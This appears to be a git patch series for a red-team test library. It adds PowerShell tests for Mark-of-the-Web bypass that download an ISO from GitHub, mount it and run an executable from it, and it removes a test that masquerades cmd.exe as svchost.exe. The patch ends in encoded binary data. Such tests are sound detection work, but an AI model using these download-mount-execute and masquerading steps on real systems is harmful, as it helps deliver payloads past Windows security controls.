16.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ebe5a1aa..6e8aae4b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -354,6 +354,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt +defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 5d54166f..690fbfdb 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -233,6 +233,7 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06- defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt +defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bb1de4c0..bfb8c069 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -622,7 +622,8 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) + - Atomic Test #1: Mount ISO image [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5b6382dc..e53dfb2f 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -439,7 +439,8 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) + - Atomic Test #1: Mount ISO image [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 558cd917..a8def1e4 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -76,7 +76,7 @@ | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 2448302b..ee76ea53 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -57,7 +57,7 @@ | | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6715564c..f0f057a6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -27216,7 +27216,42 @@ defense-evasion: x_mitre_version: '1.0' x_mitre_defense_bypassed: - Anti-virus, Application control - atomic_tests: [] + identifier: T1553.005 + atomic_tests: + - name: Mount ISO image + auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa + description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web. + Upon successful execution, powershell will download the .iso from the Atomic + Red Team repo, and mount the image. The provided sample ISO simply has a Reports + shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + +' + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + dependency_executor_name: powershell + dependencies: + - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) + +' + prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + executor: + command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" + +' + cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" + +' + name: powershell T1036.004: technique: external_references: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index 50d47c77..c7f2e10e 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -1,10 +1,12 @@ -# T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005/) -
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
+# T1553.005 - Mark-of-the-Web Bypass +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005) +
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) + +Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)
## Atomic Tests -- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image---) +- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image)
@@ -26,21 +28,25 @@ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon success #### Attack Commands: Run with `powershell`! -``` Mount-DiskImage -ImagePath "#{path_of_iso}"``` +```powershell +Mount-DiskImage -ImagePath "#{path_of_iso}" +``` #### Cleanup Commands: -``` Dismount-DiskImage -ImagePath "#{path_of_iso}"``` +```powershell +Dismount-DiskImage -ImagePath "#{path_of_iso}" +``` #### Dependencies: Run with `powershell`! ##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" ``` From 09c413e64a57c8ab2ed7eb77bee60ab7e2b9b2ad Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 9 Jun 2021 13:25:13 -0600 Subject: [PATCH 12/35] removed windows test from t1036.005 --- atomics/T1036.005/T1036.005.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 05a1bdd7..4c81dd2d 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -27,25 +27,3 @@ atomic_tests: cleanup_command: | rm -f $HOME/.../sh rmdir $HOME/.../ - -- name: Execute a process masquerading as a legitimate Windows binary - description: | - Create and execute a process masquerading as a legitimate Windows binary - - supported_platforms: - - windows - - input_arguments: - test_message: - description: Test message to echo out to the screen - type: String - default: Hello from the Atomic Red Team test T1036.005#2 - - executor: - name: command_prompt - elevation_required: false - command: | - copy %WINDIR%\System32\cmd.exe /Y %PUBLIC%\svchost.exe - start %PUBLIC%\svchost.exe /C echo "#{test_message}" - cleanup_command: | - del %PUBLIC%\svchost.exe >nul 2>&1 From e70987c4391cb9818fafb6f0fa53b9feda24f40e Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 9 Jun 2021 22:44:21 -0500 Subject: [PATCH 13/35] T1553.005 (#1509) Co-authored-by: Toua Lor --- atomics/T1553.005/T1553.005.yaml | 36 +++++++++++++++++-- atomics/T1553.005/bin/FeelTheBurn.iso | Bin 0 -> 1179648 bytes atomics/T1553.005/{src => bin}/T1553.005.iso | Bin 3 files changed, 33 insertions(+), 3 deletions(-) create mode 100644 atomics/T1553.005/bin/FeelTheBurn.iso rename atomics/T1553.005/{src => bin}/T1553.005.iso (100%) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index 000674c5..63f1ffe5 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -11,7 +11,7 @@ atomic_tests: path_of_iso: description: Path to ISO file type: path - default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso dependency_executor_name: powershell dependencies: - description: | @@ -20,11 +20,41 @@ atomic_tests: if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null - Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: | Mount-DiskImage -ImagePath "#{path_of_iso}" cleanup_command: | - Dismount-DiskImage -ImagePath "#{path_of_iso}" + Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null name: powershell +- name: Mount an ISO image and run executable from the ISO + description: |- + Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. + Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". + ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso + dependency_executor_name: powershell + dependencies: + - description: | + FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) + prereq_command: | + if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" + executor: + command: | + $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly + $driveLetter = ($keep | Get-Volume).DriveLetter + invoke-item "$($driveLetter):\hello.exe" + cleanup_command: | + Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null + Stop-process -name "hello" -Force -ErrorAction ignore + name: powershell \ No newline at end of file diff --git a/atomics/T1553.005/bin/FeelTheBurn.iso b/atomics/T1553.005/bin/FeelTheBurn.iso new file mode 100644 index 0000000000000000000000000000000000000000..491da79f9c138c767fe4bc93daa6746dda18a040 GIT binary patch literal 1179648 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 